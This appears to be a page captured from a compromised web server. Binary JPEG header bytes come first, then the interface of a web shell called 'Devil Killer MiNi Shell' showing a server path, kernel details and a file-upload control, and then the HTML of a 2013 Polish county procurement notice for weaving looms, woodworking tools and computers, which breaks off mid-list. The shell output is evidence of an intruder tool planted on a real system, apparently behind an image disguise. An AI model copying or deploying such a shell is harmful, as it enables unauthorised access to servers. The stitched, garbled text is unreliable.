JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/171378-N-2013.html

<p class="kh_header"><b>Sejny: Dostawa materiałów oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013.</b><br>
<b>Numer ogłoszenia: 171378 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sejneński , ul. 1-go Maja 1, 16-500 Sejny, woj. podlaskie, tel. 087 5162066, faks 087 5162013.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013.

Zamawiający dopuszcza składanie ofert częściowych: liczba zadań - 9
Zadanie 1
Duże krosna tkackie - 2 szt. 
Krosna mechaniczne (żakardowe) - 3 szt. 
Zadanie 2
Małe krosna tkackie - 3 szt. 
Zadanie 3
Warsztaciki do krajek - 10 szt. 
Ramy - 6 szt.
Zadanie 4
Ręczna elektryczna wyrzynarka - 1 szt. 
Maszyna stolarska - 1 szt. 
Noże do strugania drewna do w/w maszyny wieloczynnościowej (heblarki) - 4 szt.
Dłuta - 2 szt. 
Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt. 
Stół stolarski - 1 szt. 
Zadanie 5
Maszyna do szycia - 1 szt. 
Zadanie 6
Projektor z ekranem - 1 szt, Ekran projekcyjny, Aparat cyfrowy - 1 szt, Kamera - 1szt, Stojak do aparatu/kamery - 1 szt, Drukarka wielofunkcyjna - 1 szt, Komputery - 3 szt. 
Zadanie 7
Nici lniane - 80 kg, nici bawełniane - 40 kg, nici wełniane - 65 kg, wełna czesankowa - 25 kg, płótno - 60 m 
Zadanie 8
Deski - 5 m3 
Zadanie 9
Inne materiały (scyzoryki, noże, igły, papier, itp.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.71.00.00-6, 44.14.20.00-7, 38.65.10.00-3, 38.65.16.00-9, 43.81.00.00-4, 42.71.50.00-1, 38.65.21.00-1, 39.15.12.00-7, 30.21.30.00-5, 19.43.00.00-9, 39.24.10.00-3, 30.23.21.10-8, 44.19.10.00-5, 39.22.70.00-9, 30.19.73.30-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu..</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przedstawią pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia i/lub zawarcia umowy, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany niniejszej umowy wymagają zgody obu Stron wyrażonej w formie pisemnej pod rygorem nieważności. Wprowadzenie jakichkolwiek zmian i nowych postanowień do niniejszej umowy możliwe jest tylko w granicach unormowania art. 144 ustawy Prawo Zamówień Publicznych (tekst jednolity Dz.U. z 2010, nr 113 poz. 759 z późn. zm.). 
Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
1) przedłużenie w zadaniu nr 1 terminu wykonania zamówienia o okres 14 dni. Powyższa zmiana umowy może zostać dokonana pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności przedłużenia terminu oraz wyrażenia zgody przez Zamawiającego na tę zmianę.
2) zmniejszenie wartości umowy jest możliwe w przypadku zmian parametrów asortymentu na równoważne lub wyższe z jednoczesnym obniżeniem ceny; 
3) w przypadku wystąpienia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy 
4) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy w zakresie zaistniałych zmian. 
5) Pozostałe zmiany: 
-siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; 
-zmiana obowiązującej stawki VAT. (jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający nie dopuszcza możliwości zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę); -jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę. 
-rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi dostawami. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: a) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego); b)zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.st.sejny.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sejnach, ul. 1 Maja 1, 16-500 Sejny, pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Sejnach, ul. 1 Maja 1, 16-500 Sejny, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w 85 % współfinansowane z projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Duże krosna tkackie - 2 szt. 
Krosna mechaniczne (żakardowe) - 3 szt. 
W tym:
a) 1 szt krosna małe o szerokości od 60 do 80 cm i długości 150 cm (+- 2 cm) posiadające co najmniej 31 igieł.
b) 2 szt  krosna większe o szerokości od 110 do 120 cm i długości 150 do 170 cm posiadające co najmniej 90 igieł..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Duże krosna tkackie - 2 szt. 
Krosna mechaniczne (żakardowe) - 3 szt. 
W tym:
a) 1 szt krosna małe o szerokości od 60 do 80 cm i długości 150 cm (+- 2 cm) posiadające co najmniej 31 igieł.
b) 2 szt  krosna większe o szerokości od 110 do 120 cm i długości 150 do 170 cm posiadające co najmniej 90 igieł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.71.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Małe krosna tkackie - 3 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Małe krosna tkackie - 3 szt. KROSNA RĘCZNE MAŁE służące do demonstrowania tkactwa z możliwością łatwego transportu i ewentualnego montażu i demontażu. Warsztat winien mieć szerokość całkowitą około 80cm i wysokość nie większą niż 120cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.71.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaciki do krajek - 10 szt.
Ramy - 6 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaciki do krajek - 10 szt. Warsztacik do tkania krajek powinien być wykonany z twardego drewna, najlepiej dębowego. Służyć będzie do tkania zarówno wąskich jak i szerokich krajek.
Cechy i właściwości warsztatu:
- wymiary: ok. długość 130 cm po rozłożeniu i 80cm po złożeniu (w kształcie litery H), szerokość ok. 30cm, wysokość 30 cm (w kształcie litery T).
Ramy - 6 szt.
Drewniane ramy do prac rękodzielniczych związanych z wykonywaniem ażurowych splotów do powstawania serwetek, bieżników, kilimków. 
Ramy winny mieć następujące wymiary: 
I Rodzaj - wymiary 60cm na 60cm - 2szt
II Rodzaj - wymiary 75 cm na 120cm - 2szt.
III Rodzaj-wymiary 80cm na 80 cm-2szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.71.00.00-6, 44.14.20.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ręczna elektryczna wyrzynarka - 1 szt. Maszyna stolarska - 1 szt. Noże do strugania drewna do w/w maszyny wieloczynnościowej (heblarki) - 4 szt.
Dłuta - 2 szt. Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt. Stół stolarski - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczna elektryczna wyrzynarka - 1 szt. 
Wyrzynarka powinna posiadać następujące parametry:
Silnik o parametrach mocy co najmniej 700 W i zmiennej prędkości pracy. Szybki i łatwy w obsłudze mechanizm beznarzędziowej wymiany brzeszczotów z chwytem typu T. Mechanizm antywibracyjny i gumowana rękojeść pozwalają na łatwą kontrolę pracy narzędzia. Co najmniej 4-stopniowe ustawianie pracy wahadłowej umożliwiającej cięcie bardziej szybkie i dokładne. Miękki rozruch umożliwiający dokładność od początku cięcia. System odsysania pyłu oczyszczający linię cięcia z wiórów.
Kompatybilna z brzeszczotem DT2074 do cięcia krawędziowego.
Maszyna stolarska - 1 szt. 
WIELOFUNKCYJNA MASZYNA DO OBRÓBKI DREWNA posiadająca funkcje: pilarka, heblarka, grubościówka, wiertarka, frezarka. Maszyna powinna posiadać dwa blaty w tym jeden ruchomy - regulowany góra - dół oraz oddzielny trzeci blat do pilarki. Silnik o mocy 2,2kW - 2,5 kW zapewniający łatwe i pewne prowadzenie podczas wykonywanych prac. Powinna być możliwa obróbka materiałów o większych rozmiarach, pozwalając pracować z drewnem miękkim i twardym, wykonując np. planowanie, czy uzyskiwanie pożądanych rozmiarów, kształtów i profili. Preferowane jest solidne wykonanie. Maszyna dodatkowo powinna być wyposażona w nóżki, które poprawiają wygodę podczas prac.
Dłuta - 2 szt. 
1 szt = 1 kpl W komplecie winny być dłuta do ręcznego wycinania otworów oraz różnych wgłębień w drewnie i prac snycerskich w ilości 7-10 dłut (w komplecie). 
Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt. 
Wiertarka winna mieć funkcję: wkręcanie-wykręcanie śrub, wkrętów do drewna. 
Powinna posiadać następującą charakterystykę:
- mechaniczna dwubiegowa przekładnia planetarna o dużej sile przewiercania, 
- kilkustopniowa regulacja momentu dokręcania oraz dwa stopnie wiercenia, układ elektroniczny umożliwiający delikatne wiercenie i wkręcanie.
Stół stolarski - 1 szt. 
Stół stolarski - 4 elementowy do prac stolarskich związanych z wyrobami galanterii drewnianej i innych przedmiotów z drewna. Wymiary stołu około (długość x szerokość x wysokość) 720 x 60 x 85cm. Wykonany z 4 elementów z drewna bukowego lub innego twardszego materiału posiadające przynajmniej jeden w każdym elemencie regulowany docisk, blat z wgłębieniem i kilkoma otworami. Dobrze widziany schowek na narzędzia pod blatem stołu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 43.81.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Maszyna do szycia - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maszyna do szycia - 1 szt. 
Wieloczynnościowa elektryczna maszyna do szycia, prosta w obsłudze i posiadająca najważniejsze funkcje do szycia, prostego i ozdobnego:
Winna posiadać:
- kilkadziesiąt programów ściegowych ,w tym ściegi proste, użytkowe, owerlokowe, kryte i bardzo przydatne ściegi ozdobne do haftowania wzorów ludowych w postaci kwiatków, gałązek itp.
- kilka rodzajów automatycznego obszywania dziurek
- płynną regulacje długości ściegu (do 5 mm) 
- płynną regulację szerokości ściegów (do 7 mm)
- duży, czytelny wyświetlacz LCD, który informuje o wybranym ściegu, jego długości i szerokości oraz podpowiada, jaką stopkę zastosować
- precyzyjną regulację prędkości szycia
- przycisk START/STOP (możliwość szycia bez rozrusznika nożnego)
- automatyczne ryglowanie
- wolne ramię - łatwe szycie na okrągło 
- regulowany docisk stopki 
- możliwość szycia wstecz 
- wyłączany transport
- wbudowany zewnętrzny obcinacz nitek
- wbudowany nawlekacz igły
- możliwość szycia podwójną igłą (szycie dekoracyjne)
- wbudowany nawlekacz igły
- możliwość szycia podwójna igłą 
- oświetlenie miejsca szycia z maszyny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.71.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Projektor z ekranem - 1 szt. 
Ekran projekcyjny
Aparat cyfrowy - 1 szt. 
Kamera - 1szt. 
Stojak do aparatu/kamery - 1 szt. 
Drukarka wielofunkcyjna - 1 szt. 
Komputery - 3 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projektor z ekranem - 1 szt. 
Wymagania minimalne:
Rozdzielczość optyczna min.1920 x 1080
Kontrast min. 5000:1
Jasność ANSI [lumen]: min. 2000
Przekątna ekranu [m]: min 0.71, maks. 7.62
Gwarancja (projektor): co najmniej 24 miesiące
Żywotność lampy: min. 4500 h
Głośniki: wbudowany, min. 10W
Torba: W zestawie
Ekran projekcyjny
Wymiary: 175x175 cm
Stojak: TAK

Aparat cyfrowy - 1 szt. 
Typ: Aparat fotograficzny kompakt
Zoom: co najmniej 20x optyczny, obiektyw szerokokątny 25 mm;
Matryca: CMOS min 12,0 MP
Procesor: DIGIC 5
GPS: Tak
System: Intelligent IS
Filmy: Full HD
Wyświetlacz LCD: przekątna min 7,0 cm,
Tryb: Smart Auto (58 scen); identyfikacja twarzy a także ręczny, Av i Tv
Karta pamięci: w zestawie karta SDHC ,16 GB, 2 sztuki
Pokrowiec: w zestawie 
Gwarancja: co najmniej 24 miesiące
Kamera - 1szt. 
Typ: Kamera wideo FULL HD 3MOS
Przetwornik obrazu: Przetwornik MOS 1/4.1 x 3
Całkowita liczba pikseli: nie mniejsza niż 9 megapikseli (3 megapikseli x 3 )
Zoom Optyczny: nie mniejszy niż 12x
Długość ogniskowej 2.84 - 34.1 mm 
Nośniki zapisu Karty pamięci SD/SDHC/SDXC
Stojak do aparatu/kamery - 1 szt. 
Statyw
Maksymalna wysokość nie mniejsza niż 155 cm
Głowica: GŁOWICA 3D, Z TRZEMA RĄCZKAMI
Pokrowiec: tak
Drukarka wielofunkcyjna - 1 szt. 
Typ: URZĄDZENIE WIELOFUNKCYJNE LASEROWE KOLOROWE
Dupleks: TAK
Sieć bezprzewodowa: TAK
Prędkość kopiowania: minimum 25 str./min (mono i kolor)
Podajnik papieru: min. 250 arkuszy
Tonery zapasowe: ORYGINAŁY, black - 2 szt., yellow: 1 szt., magenta - 1 szt., cyjan - 1 szt.
Komputery - 3 szt. 
Komputer nr 1 (notebook):
Przekątna ekranu: 13-14,9 cala
Procesor: Intel serii i-3 lub równoważny osiągający w teście PassMark
CPU wynik minimum 2622 punktów
Liczba gniazd USB 3.0: 3
Dysk twardy: min. 500 GB
Pamięć operacyjna: min. 4GB
System operacyjny: Windows 7 / 8 / nowszy lub równoważny. 
Oprogramowanie: Pakiet MS Office 2010 lub równoważny. Za pakiet równoważny uważa się taki, w którym bezproblemowo można otwierać pliki formatów docx, xlsx, pptx.
Gwarancja: min. 24 miesiące
